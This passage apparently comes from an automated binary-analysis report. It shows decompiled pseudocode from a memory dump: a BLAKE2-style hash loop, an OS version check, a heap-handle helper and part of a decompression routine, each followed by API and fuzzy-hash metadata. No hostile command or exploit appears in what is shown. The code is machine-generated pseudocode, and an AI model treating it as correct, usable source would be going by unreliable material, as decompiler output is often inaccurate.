                									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
                									goto L55;
                								}
                								if(_t210 == 1) {
                									 *_t265 =  *_t265 | 0x00000c00;
                								}
                							}
                							goto L58;
                						}
                						if(_t175 == 0x200) {
                							_t250 = _a4;
                							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
                							goto L35;
                						}
                						if(_t175 == 0x300) {
                							 *_a4 =  *_a4 & 0xffffffe3;
                						}
                						goto L36;
                					}
                					if(_t172 == 0x800) {
                						_t257 = _a4;
                						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
                						goto L26;
                					}
                					if(_t172 == 0xc00) {
                						 *_a4 =  *_a4 | 0x00000003;
                					}
                				}
                			}
























                APIs
                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00CD064F,?,?,00000008,?,?,00CD02EF,00000000), ref: 00CD0881
                Similarity
                • API ID: ExceptionRaise
                • String ID:
                • API String ID: 3997070919-0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 81%
                			E00CA3EAD() {
                				void* _t230;
                				signed int* _t231;
                				intOrPtr _t240;
                				signed int _t245;
                				intOrPtr _t246;
                				signed int _t257;
                				intOrPtr _t258;
                				signed int _t269;
                				intOrPtr _t270;
                				signed int _t275;
                				signed int _t280;
                				signed int _t285;
                				signed int _t290;
                				signed int _t295;
                				intOrPtr _t296;
                				signed int _t301;
                				intOrPtr _t302;
                				signed int _t307;
                				intOrPtr _t308;
                				signed int _t313;
                				intOrPtr _t314;
                				signed int _t319;
                				signed int _t324;
                				signed int _t329;
                				signed int _t333;
                				signed int _t334;
                				signed int _t336;
                				signed int _t337;
                				signed int _t338;
                				signed int _t340;
                				signed int _t341;
                				signed int _t342;
                				signed int _t348;
                				signed int _t350;
                				signed int _t351;
                				signed int _t353;
                				signed int _t355;
                				signed int _t356;
                				signed int _t358;
                				signed int _t360;
                				signed int _t362;
                				signed int _t363;
                				signed int _t365;
                				signed int _t366;
                				signed int _t368;
                				signed int _t369;
                				signed int _t371;
                				signed int _t372;
                				signed int _t374;
                				signed int _t375;
                				intOrPtr _t376;
                				intOrPtr _t377;
                				signed int _t379;
                				signed int _t381;
                				intOrPtr _t383;
                				signed int _t385;
                				signed int _t386;
                				signed int _t388;
                				signed int _t389;
                				signed int _t390;
                				signed int _t391;
                				signed int _t392;
                				signed int _t393;
                				signed int _t394;
                				signed int _t395;
                				intOrPtr _t396;
                				signed int _t398;
                				intOrPtr _t399;
                				signed int _t407;
                				signed int _t409;
                				signed int _t411;
                				signed int _t412;
                				signed int _t414;
                				signed int _t418;
                				signed int _t420;
                				signed int _t422;
                				signed int _t423;
                				signed int _t425;
                				signed int _t427;
                				signed int _t429;
                				intOrPtr _t431;
                				signed int _t433;
                				intOrPtr _t434;
                				void* _t435;
                				void* _t436;
                				void* _t437;
                
                				_t377 =  *((intOrPtr*)(_t435 + 0xc0));
                				_t342 = 0x10;
                				 *((intOrPtr*)(_t435 + 0x18)) = 0x3c6ef372;
                				memcpy(_t435 + 0x8c,  *(_t435 + 0xd0), _t342 << 2);
                				_t436 = _t435 + 0xc;
                				_push(8);
                				_t230 = memcpy(_t436 + 0x4c,  *(_t377 + 0xf4), 0 << 2);
                				_t437 = _t436 + 0xc;
                				_t418 =  *_t230 ^ 0x510e527f;
                				_t231 =  *(_t377 + 0xfc);
                				_t407 =  *(_t230 + 4) ^ 0x9b05688c;
                				_t334 =  *(_t437 + 0x64);
                				 *(_t437 + 0x28) = 0x6a09e667;
                				 *(_t437 + 0x30) = 0xbb67ae85;
                				_t379 =  *_t231 ^ 0x1f83d9ab;
                				_t348 =  *(_t437 + 0x5c);
                				 *(_t437 + 0x44) = _t231[1] ^ 0x5be0cd19;
                				 *(_t437 + 0x3c) =  *(_t437 + 0x68);
                				 *(_t437 + 0x1c) =  *(_t437 + 0x60);
                				 *(_t437 + 0x2c) =  *(_t437 + 0x58);
                				 *(_t437 + 0x38) =  *(_t437 + 0x54);
                				 *(_t437 + 0x20) =  *(_t437 + 0x50);
                				 *((intOrPtr*)(_t437 + 0x10)) = 0;
                				 *((intOrPtr*)(_t437 + 0x48)) = 0;
                				_t427 =  *(_t437 + 0x44);
                				 *(_t437 + 0x14) =  *(_t437 + 0x4c);
                				_t240 =  *((intOrPtr*)(_t437 + 0x10));
                				 *(_t437 + 0x24) = 0xa54ff53a;
                				 *(_t437 + 0x40) = _t334;
                				 *(_t437 + 0x34) = _t348;
                				do {
                					_t37 = _t240 + 0xcd23b0; // 0x3020100
                					_t350 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t37 & 0x000000ff) * 4)) + _t348;
                					 *(_t437 + 0x14) = _t350;
                					_t351 = _t350 ^ _t418;
                					asm("rol ecx, 0x10");
                					_t245 =  *(_t437 + 0x28) + _t351;
                					_t420 =  *(_t437 + 0x34) ^ _t245;
                					 *(_t437 + 0x28) = _t245;
                					_t246 =  *((intOrPtr*)(_t437 + 0x10));
                					asm("ror esi, 0xc");
                					 *(_t437 + 0x34) = _t420;
                					_t48 = _t246 + 0xcd23b1; // 0x4030201
                					_t422 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t48 & 0x000000ff) * 4)) + _t420;
                					 *(_t437 + 0x14) = _t422;
                					_t423 = _t422 ^ _t351;
                					asm("ror esi, 0x8");
                					_t353 =  *(_t437 + 0x28) + _t423;
                					 *(_t437 + 0x28) = _t353;
                					asm("ror eax, 0x7");
                					 *(_t437 + 0x34) =  *(_t437 + 0x34) ^ _t353;
                					_t60 =  *((intOrPtr*)(_t437 + 0x10)) + 0xcd23b2; // 0x5040302
                					_t355 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t60 & 0x000000ff) * 4)) +  *(_t437 + 0x1c);
                					 *(_t437 + 0x20) = _t355;
                					_t356 = _t355 ^ _t407;
                					asm("rol ecx, 0x10");
                					_t257 =  *(_t437 + 0x30) + _t356;
                					_t409 =  *(_t437 + 0x1c) ^ _t257;
                					 *(_t437 + 0x30) = _t257;
                					_t258 =  *((intOrPtr*)(_t437 + 0x10));
                					asm("ror edi, 0xc");
                					 *(_t437 + 0x1c) = _t409;
                					_t71 = _t258 + 0xcd23b3; // 0x6050403
                					_t411 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t71 & 0x000000ff) * 4)) + _t409;
                					 *(_t437 + 0x20) = _t411;
                					_t412 = _t411 ^ _t356;
                					asm("ror edi, 0x8");
                					_t358 =  *(_t437 + 0x30) + _t412;
                					 *(_t437 + 0x30) = _t358;
                					asm("ror eax, 0x7");
                					 *(_t437 + 0x1c) =  *(_t437 + 0x1c) ^ _t358;
                					_t82 =  *((intOrPtr*)(_t437 + 0x10)) + 0xcd23b4; // 0x7060504
                					_t336 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t82 & 0x000000ff) * 4)) + _t334;
                					_t360 = _t336 ^ _t379;
                					asm("rol ecx, 0x10");
                					_t269 =  *(_t437 + 0x18) + _t360;
                					_t381 =  *(_t437 + 0x40) ^ _t269;
                					 *(_t437 + 0x18) = _t269;
                					_t270 =  *((intOrPtr*)(_t437 + 0x10));
                					asm("ror edx, 0xc");
                					_t91 = _t270 + 0xcd23b5; // 0x8070605
                					_t337 = _t336 +  *((intOrPtr*)(_t437 + 0x8c + ( *_t91 & 0x000000ff) * 4)) + _t381;
                					 *(_t437 + 0x38) = _t337;
                					_t338 = _t337 ^ _t360;
                					asm("ror ebx, 0x8");
                					_t275 =  *(_t437 + 0x18) + _t338;
                					 *(_t437 + 0x18) = _t275;
                					asm("ror edx, 0x7");
                					 *(_t437 + 0x40) = _t381 ^ _t275;
                					_t383 =  *((intOrPtr*)(_t437 + 0x10));
                					_t101 = _t383 + 0xcd23b6; // 0x9080706
                					_t362 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t101 & 0x000000ff) * 4)) +  *(_t437 + 0x3c);
                					 *(_t437 + 0x2c) = _t362;
                					_t363 = _t362 ^ _t427;
                					asm("rol ecx, 0x10");
                					_t280 =  *(_t437 + 0x24) + _t363;
                					_t429 =  *(_t437 + 0x3c) ^ _t280;
                					 *(_t437 + 0x24) = _t280;
                					_t110 = _t383 + 0xcd23b7; // 0xa090807
                					asm("ror ebp, 0xc");
                					_t385 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t110 & 0x000000ff) * 4)) + _t429;
                					 *(_t437 + 0x2c) = _t385;
                					_t386 = _t385 ^ _t363;
                					asm("ror edx, 0x8");
                					_t285 =  *(_t437 + 0x24) + _t386;
                					 *(_t437 + 0x24) = _t285;
                					asm("ror ebp, 0x7");
                					 *(_t437 + 0x3c) = _t429 ^ _t285;
                					_t431 =  *((intOrPtr*)(_t437 + 0x10));
                					_t121 = _t431 + 0xcd23b8; // 0xb0a0908
                					_t365 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t121 & 0x000000ff) * 4)) +  *(_t437 + 0x1c);
                					 *(_t437 + 0x14) = _t365;
                					_t366 = _t365 ^ _t386;
                					asm("rol ecx, 0x10");
                					_t290 =  *(_t437 + 0x18) + _t366;
                					_t388 =  *(_t437 + 0x1c) ^ _t290;
                					 *(_t437 + 0x18) = _t290;
                					_t130 = _t431 + 0xcd23b9; // 0xc0b0a09
                					asm("ror edx, 0xc");
                					_t433 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t130 & 0x000000ff) * 4)) + _t388;
                					 *(_t437 + 0x14) = _t433;
                					 *(_t437 + 0x4c) = _t433;
                					_t427 = _t433 ^ _t366;
                					asm("ror ebp, 0x8");
                					_t295 =  *(_t437 + 0x18) + _t427;
                					_t389 = _t388 ^ _t295;
                					 *(_t437 + 0x18) = _t295;
                					 *(_t437 + 0x74) = _t295;
                					_t296 =  *((intOrPtr*)(_t437 + 0x10));
                					asm("ror edx, 0x7");
                					 *(_t437 + 0x1c) = _t389;
                					 *(_t437 + 0x60) = _t389;
                					_t144 = _t296 + 0xcd23ba; // 0xd0c0b0a
                					_t390 =  *(_t437 + 0x40);
                					_t368 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t144 & 0x000000ff) * 4)) + _t390;
                					 *(_t437 + 0x20) = _t368;
                					_t369 = _t368 ^ _t423;
                					asm("rol ecx, 0x10");
                					_t301 =  *(_t437 + 0x24) + _t369;
                					_t391 = _t390 ^ _t301;
                					 *(_t437 + 0x24) = _t301;
                					_t302 =  *((intOrPtr*)(_t437 + 0x10));
                					asm("ror edx, 0xc");
                					_t154 = _t302 + 0xcd23bb; // 0xe0d0c0b
                					_t425 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t154 & 0x000000ff) * 4)) + _t391;
                					 *(_t437 + 0x20) = _t425;
                					 *(_t437 + 0x50) = _t425;
                					_t418 = _t425 ^ _t369;
                					asm("ror esi, 0x8");
                					_t307 =  *(_t437 + 0x24) + _t418;
                					_t392 = _t391 ^ _t307;
                					 *(_t437 + 0x24) = _t307;
                					 *(_t437 + 0x78) = _t307;
                					_t308 =  *((intOrPtr*)(_t437 + 0x10));
                					asm("ror edx, 0x7");
                					 *(_t437 + 0x40) = _t392;
                					 *(_t437 + 0x64) = _t392;
                					_t167 = _t308 + 0xcd23bc; // 0xf0e0d0c
                					_t393 =  *(_t437 + 0x3c);
                					_t371 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t167 & 0x000000ff) * 4)) + _t393;
                					 *(_t437 + 0x38) = _t371;
                					_t372 = _t371 ^ _t412;
                					asm("rol ecx, 0x10");
                					_t313 =  *(_t437 + 0x28) + _t372;
                					_t394 = _t393 ^ _t313;
                					 *(_t437 + 0x28) = _t313;
                					_t314 =  *((intOrPtr*)(_t437 + 0x10));
                					asm("ror edx, 0xc");
                					_t177 = _t314 + 0xcd23bd; // 0xe0f0e0d
                					_t414 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t177 & 0x000000ff) * 4)) + _t394;
                					 *(_t437 + 0x38) = _t414;
                					 *(_t437 + 0x54) = _t414;
                					_t407 = _t414 ^ _t372;
                					asm("ror edi, 0x8");
                					_t319 =  *(_t437 + 0x28) + _t407;
                					_t395 = _t394 ^ _t319;
                					 *(_t437 + 0x28) = _t319;
                					asm("ror edx, 0x7");
                					 *(_t437 + 0x3c) = _t395;
                					 *(_t437 + 0x68) = _t395;
                					_t396 =  *((intOrPtr*)(_t437 + 0x10));
                					 *(_t437 + 0x6c) = _t319;
                					_t190 = _t396 + 0xcd23be; // 0xa0e0f0e
                					_t374 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t190 & 0x000000ff) * 4)) +  *(_t437 + 0x34);
                					 *(_t437 + 0x2c) = _t374;
                					_t375 = _t374 ^ _t338;
                					asm("rol ecx, 0x10");
                					_t324 =  *(_t437 + 0x30) + _t375;
                					_t340 =  *(_t437 + 0x34) ^ _t324;
                					 *(_t437 + 0x30) = _t324;
                					_t199 = _t396 + 0xcd23bf; // 0x40a0e0f
                					asm("ror ebx, 0xc");
                					_t398 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t199 & 0x000000ff) * 4)) + _t340;
                					 *(_t437 + 0x2c) = _t398;
                					 *(_t437 + 0x58) = _t398;
                					_t379 = _t398 ^ _t375;
                					asm("ror edx, 0x8");
                					_t329 =  *(_t437 + 0x30) + _t379;
                					_t341 = _t340 ^ _t329;
                					 *(_t437 + 0x30) = _t329;
                					 *(_t437 + 0x70) = _t329;
                					asm("ror ebx, 0x7");
                					_t240 =  *((intOrPtr*)(_t437 + 0x10)) + 0x10;
                					 *(_t437 + 0x34) = _t341;
                					_t348 =  *(_t437 + 0x34);
                					 *(_t437 + 0x5c) = _t341;
                					_t334 =  *(_t437 + 0x40);
                					 *((intOrPtr*)(_t437 + 0x10)) = _t240;
                				} while (_t240 <= 0x90);
                				 *(_t437 + 0x84) = _t379;
                				_t399 =  *((intOrPtr*)(_t437 + 0xd0));
                				 *(_t437 + 0x88) = _t427;
                				_t434 =  *((intOrPtr*)(_t437 + 0x48));
                				 *(_t437 + 0x7c) = _t418;
                				 *(_t437 + 0x80) = _t407;
                				do {
                					_t376 =  *((intOrPtr*)(_t399 + 0xf4));
                					_t333 =  *(_t437 + _t434 + 0x6c) ^  *(_t376 + _t434) ^  *(_t437 + _t434 + 0x4c);
                					 *(_t376 + _t434) = _t333;
                					_t434 = _t434 + 4;
                				} while (_t434 < 0x20);
                				return _t333;
                			}

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID:
                • String ID: gj
                • API String ID: 0-4203073231
                • Opcode ID: 22a0ade61fe89557603e0605dc43cf47df5d6e7ca9007a3a8eb003f23fb9ae3b
                • Instruction ID: f2e5bf1f11d63a75b4c0339264af6e08fbb5a0884a436af540df472eea417933
                • Opcode Fuzzy Hash: 22a0ade61fe89557603e0605dc43cf47df5d6e7ca9007a3a8eb003f23fb9ae3b
                • Instruction Fuzzy Hash: DEF1E4B2A083418FC748CF29D880A2AFBE5BFC8208F15892EF598D7751D734E9558F56
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00CAA995() {
                				struct _OSVERSIONINFOW _v280;
                				signed int _t6;
                				intOrPtr _t12;
                				intOrPtr _t13;
                
                				_t12 =  *0xcdd020; // 0x2
                				if(_t12 != 0xffffffff) {
                					_t6 =  *0xce00f0; // 0xa
                					_t13 =  *0xce00f4; // 0x0
                				} else {
                					_v280.dwOSVersionInfoSize = 0x114;
                					GetVersionExW( &_v280);
                					_t12 = _v280.dwPlatformId;
                					_t6 = _v280.dwMajorVersion;
                					_t13 = _v280.dwMinorVersion;
                					 *0xcdd020 = _t12;
                					 *0xce00f0 = _t6;
                					 *0xce00f4 = _t13;
                				}
                				if(_t12 != 2) {
                					return 0x501;
                				} else {
                					return (_t6 << 8) + _t13;
                				}
                			}








                APIs
                • GetVersionExW.KERNEL32(?), ref: 00CAA9BA
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: Version
                • String ID:
                • API String ID: 1889659487-0
                • Opcode ID: 0f86c13471832f5d1fb3fc3e0807a8aded0db1a30f8157f1cf3c5d98c7fd97c5
                • Instruction ID: 51bf117c9dd98bf661c4068f7941ce5fef38badfe3957468aa08b9cd917d4c4f
                • Opcode Fuzzy Hash: 0f86c13471832f5d1fb3fc3e0807a8aded0db1a30f8157f1cf3c5d98c7fd97c5
                • Instruction Fuzzy Hash: 86F030B0D412098BC728CB18EE82BEE77B5F759314F204299DE1547350E370AE80DEA1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00CCACA1() {
                				signed int _t3;
                
                				_t3 = GetProcessHeap();
                				 *0xd00874 = _t3;
                				return _t3 & 0xffffff00 | _t3 != 0x00000000;
                			}





                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: HeapProcess
                • String ID:
                • API String ID: 54951025-0
                • Opcode ID: 025838e87d3d79a898aa7a066f63443f012015173e501ce64e9fa3a7eb7a8577
                • Instruction ID: e8197b3bbb2d5428f72457c3ef3f3e1e3f66bdbe0f2c5eaae93ea41dbe02ad56
                • Opcode Fuzzy Hash: 025838e87d3d79a898aa7a066f63443f012015173e501ce64e9fa3a7eb7a8577
                • Instruction Fuzzy Hash: 1CA00274603302DFD7409F35AF0930D3FE9BA55AD1B09D16AA61DC6274EB34C860BB51
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 96%
                			E00CB589E(intOrPtr __esi) {
                				signed int _t314;
                				signed int _t315;
                				signed int _t316;
                				signed int _t318;
                				signed int _t319;
                				signed int _t320;
                				signed int _t321;
                				signed int _t322;
                				signed int _t324;
                				signed int _t325;
                				signed int _t326;
                				void* _t328;
                				intOrPtr _t333;
                				signed int _t347;
                				char _t356;
                				unsigned int _t359;
                				void* _t366;
                				intOrPtr _t371;
                				signed int _t381;
                				char _t390;
                				unsigned int _t391;
                				void* _t399;
                				intOrPtr _t400;
                				signed int _t403;
                				char _t412;
                				signed int _t414;
                				intOrPtr _t415;
                				signed int _t417;
                				signed int _t418;
                				signed int _t419;
                				signed int _t420;
                				signed int _t422;
                				signed int _t423;
                				signed short _t424;
                				signed int _t425;
                				signed int _t428;
                				signed int _t429;
                				signed int _t430;
                				signed int _t431;
                				signed int _t433;
                				signed int _t434;
                				signed short _t435;
                				unsigned int _t439;
                				unsigned int _t444;
                				signed int _t458;
                				signed int _t460;
                				signed int _t461;
                				signed int _t464;
                				signed int _t466;
                				signed int _t468;
                				signed int _t471;
                				signed int _t472;
                				signed int _t473;
                				intOrPtr* _t474;
                				signed int _t478;
                				signed int _t479;
                				intOrPtr _t483;
                				unsigned int _t486;
                				void* _t488;
                				signed int _t491;
                				signed int* _t493;
                				unsigned int _t496;
                				void* _t498;
                				signed int _t501;
                				signed int _t503;
                				signed int _t511;
                				void* _t514;
                				signed int _t517;
                				signed int _t519;
                				signed int _t522;
                				void* _t525;
                				signed int _t528;
                				signed int _t529;
                				intOrPtr* _t531;
                				void* _t532;
                				signed int _t535;
                				signed int _t537;
                				signed int _t539;
                				unsigned int _t546;
                				void* _t548;
                				signed int _t551;
                				unsigned int _t555;
                				void* _t557;
                				signed int _t560;
                				intOrPtr* _t562;
                				void* _t563;
                				signed int _t566;
                				void* _t569;
                				signed int _t572;
                				intOrPtr* _t575;
                				void* _t576;
                				signed int _t579;
                				void* _t582;
                				signed int _t585;
                				signed int _t586;
                				intOrPtr* _t591;
                				void* _t592;
                				signed int _t595;
                				signed int* _t598;
                				unsigned int _t600;
                				signed int _t603;
                				unsigned int _t605;
                				signed int _t608;
                				void* _t611;
                				signed int _t613;
                				signed int _t614;
                				void* _t615;
                				unsigned int _t617;
                				unsigned int _t621;
                				signed int _t624;
                				signed int _t625;
                				signed int _t626;
                				signed int _t627;
                				signed int _t628;
                				signed int _t629;
                				unsigned int _t632;
                				signed int _t634;
                				intOrPtr* _t637;
                				intOrPtr _t638;
                				signed int _t639;
                				signed int _t640;
                				signed int _t641;
                				signed int _t643;
                				signed int _t644;
                				signed int _t645;
                				char* _t646;
                				signed int _t648;
                				signed int _t649;
                				signed int _t651;
                				char* _t652;
                				intOrPtr* _t656;
                				signed int _t657;
                				void* _t658;
                				void* _t661;
                
                				L0:
                				while(1) {
                					L0:
                					_t638 = __esi;
                					_t598 = __esi + 0x7c;
                					while(1) {
                						L1:
                						 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
                						if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
                							goto L12;
                						} else {
                							_t637 = _t638 + 0x8c;
                						}
                						while(1) {
                							L3:
                							_t661 =  *_t643 -  *((intOrPtr*)(_t638 + 0x94)) - 1 +  *_t637;
                							if(_t661 <= 0 && (_t661 != 0 ||  *(_t638 + 8) <  *((intOrPtr*)(_t638 + 0x90)))) {
                								break;
                							}
                							L6:
                							if( *((char*)(_t638 + 0x9c)) != 0) {
                								L99:
                								_t415 = E00CB47DA(_t638);
                								L100:
                								return _t415;
                							}
                							L7:
                							_push(_t637);
                							_push(_t643);
                							_t415 = E00CB33D3(_t638);
                							if(_t415 == 0) {
                								goto L100;
                							}
                							L8:
                							_push(_t638 + 0xa0);
                							_push(_t637);
                							_push(_t643);
                							_t415 = E00CB397F(_t638);
                							if(_t415 != 0) {
                								continue;
                							} else {
                								goto L100;
                							}
                						}
                						L10:
                						_t458 = E00CB4422(_t638);
                						__eflags = _t458;
                						if(_t458 == 0) {
                							goto L99;
                						} else {
                							_t598 = _t638 + 0x7c;
                						}
                						L12:
                						_t483 =  *((intOrPtr*)(_t638 + 0x4b3c));
                						__eflags = (_t483 -  *_t598 &  *(_t638 + 0xe6dc)) - 0x1004;
                						if((_t483 -  *_t598 &  *(_t638 + 0xe6dc)) >= 0x1004) {
                							L18:
                							_t314 = E00CAA4ED(_t643);
                							_t315 =  *(_t638 + 0x124);
                							_t600 = _t314 & 0x0000fffe;
                							__eflags = _t600 -  *((intOrPtr*)(_t638 + 0xa4 + _t315 * 4));
                							if(_t600 >=  *((intOrPtr*)(_t638 + 0xa4 + _t315 * 4))) {
                								L20:
                								_t627 = 0xf;
                								_t316 = _t315 + 1;
                								__eflags = _t316 - _t627;
                								if(_t316 >= _t627) {
                									L26:
                									_t486 =  *(_t643 + 4) + _t627;
                									 *(_t643 + 4) = _t486 & 0x00000007;
                									_t318 = _t486 >> 3;
                									 *_t643 =  *_t643 + _t318;
                									_t488 = 0x10;
                									_t491 =  *((intOrPtr*)(_t638 + 0xe4 + _t627 * 4)) + (_t600 -  *((intOrPtr*)(_t638 + 0xa0 + _t627 * 4)) >> _t488 - _t627);
                									__eflags = _t491 -  *((intOrPtr*)(_t638 + 0xa0));
                									asm("sbb eax, eax");
                									_t319 = _t318 & _t491;
                									__eflags = _t319;
                									_t460 =  *(_t638 + 0xd28 + _t319 * 2) & 0x0000ffff;
                									goto L27;
                								} else {
                									_t591 = _t638 + (_t316 + 0x29) * 4;
                									while(1) {
                										L22:
                										__eflags = _t600 -  *_t591;
                										if(_t600 <  *_t591) {
                											_t627 = _t316;
                											goto L26;
                										}
                										L23:
                										_t316 = _t316 + 1;
                										_t591 = _t591 + 4;
                										__eflags = _t316 - 0xf;
                										if(_t316 < 0xf) {
                											continue;
                										} else {
                											goto L26;
                										}
                									}
                									goto L26;
                								}
                							} else {
                								_t592 = 0x10;
                								_t626 = _t600 >> _t592 - _t315;
                								_t595 = ( *(_t626 + _t638 + 0x128) & 0x000000ff) +  *(_t643 + 4);
                								 *_t643 =  *_t643 + (_t595 >> 3);
                								 *(_t643 + 4) = _t595 & 0x00000007;
                								_t460 =  *(_t638 + 0x528 + _t626 * 2) & 0x0000ffff;
                								L27:
                								__eflags = _t460 - 0x100;
                								if(_t460 >= 0x100) {
                									L31:
                									__eflags = _t460 - 0x106;
                									if(_t460 < 0x106) {
                										L96:
                										__eflags = _t460 - 0x100;
                										if(_t460 != 0x100) {
                											L102:
                											__eflags = _t460 - 0x101;
                											if(_t460 != 0x101) {
                												L129:
                												_t461 = _t460 + 0xfffffefe;
                												__eflags = _t461;
                												_t493 = _t638 + (_t461 + 0x18) * 4;
                												_t603 =  *_t493;
                												 *(_t658 + 0x30) = _t603;
                												if(_t461 == 0) {
                													L131:
                													 *(_t638 + 0x60) = _t603;
                													_t320 = E00CAA4ED(_t643);
                													_t321 =  *(_t638 + 0x2de8);
                													_t605 = _t320 & 0x0000fffe;
                													__eflags = _t605 -  *((intOrPtr*)(_t638 + 0x2d68 + _t321 * 4));
                													if(_t605 >=  *((intOrPtr*)(_t638 + 0x2d68 + _t321 * 4))) {
                														L133:
                														_t628 = 0xf;
                														_t322 = _t321 + 1;
                														__eflags = _t322 - _t628;
                														if(_t322 >= _t628) {
                															L139:
                															_t496 =  *(_t643 + 4) + _t628;
                															 *(_t643 + 4) = _t496 & 0x00000007;
                															_t324 = _t496 >> 3;
                															 *_t643 =  *_t643 + _t324;
                															_t498 = 0x10;
                															_t501 =  *((intOrPtr*)(_t638 + 0x2da8 + _t628 * 4)) + (_t605 -  *((intOrPtr*)(_t638 + 0x2d64 + _t628 * 4)) >> _t498 - _t628);
                															__eflags = _t501 -  *((intOrPtr*)(_t638 + 0x2d64));
                															asm("sbb eax, eax");
                															_t325 = _t324 & _t501;
                															__eflags = _t325;
                															_t326 =  *(_t638 + 0x39ec + _t325 * 2) & 0x0000ffff;
                															L140:
                															_t629 = _t326 & 0x0000ffff;
                															__eflags = _t629 - 8;
                															if(_t629 >= 8) {
                																_t464 = (_t629 >> 2) - 1;
                																_t629 = (_t629 & 0x00000003 | 0x00000004) << _t464;
                																__eflags = _t629;
                															} else {
                																_t464 = 0;
                															}
                															_t632 = _t629 + 2;
                															__eflags = _t464;
                															if(_t464 != 0) {
                																_t391 = E00CAA4ED(_t643);
                																_t525 = 0x10;
                																_t632 = _t632 + (_t391 >> _t525 - _t464);
                																_t528 =  *(_t643 + 4) + _t464;
                																 *_t643 =  *_t643 + (_t528 >> 3);
                																_t529 = _t528 & 0x00000007;
                																__eflags = _t529;
                																 *(_t643 + 4) = _t529;
                															}
                															__eflags =  *((char*)(_t638 + 0x4c44));
                															_t608 =  *(_t658 + 0x30);
                															 *(_t638 + 0x74) = _t632;
                															if( *((char*)(_t638 + 0x4c44)) == 0) {
                																L147:
                																_t503 =  *(_t638 + 0x7c);
                																_t466 = _t503 - _t608;
                																_t328 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
                																__eflags = _t466 - _t328;
                																if(_t466 >= _t328) {
                																	L158:
                																	__eflags = _t632;
                																	if(_t632 == 0) {
                																		while(1) {
                																			L0:
                																			_t638 = __esi;
                																			_t598 = __esi + 0x7c;
                																			goto L1;
                																		}
                																	}
                																	L159:
                																	_t644 =  *(_t638 + 0xe6dc);
                																	do {
                																		L160:
                																		_t645 = _t644 & _t466;
                																		_t466 = _t466 + 1;
                																		 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)( *((intOrPtr*)(_t638 + 0x4b40)) + _t645));
                																		_t598 = _t638 + 0x7c;
                																		_t644 =  *(_t638 + 0xe6dc);
                																		 *_t598 =  *_t598 + 0x00000001 & _t644;
                																		_t632 = _t632 - 1;
                																		__eflags = _t632;
                																	} while (_t632 != 0);
                																	goto L161;
                																}
                																L148:
                																__eflags = _t503 - _t328;
                																if(_t503 >= _t328) {
                																	goto L158;
                																}
                																L149:
                																_t333 =  *((intOrPtr*)(_t638 + 0x4b40));
                																_t468 = _t466 + _t333;
                																_t646 = _t333 + _t503;
                																 *(_t638 + 0x7c) = _t503 + _t632;
                																__eflags = _t608 - _t632;
                																if(_t608 >= _t632) {
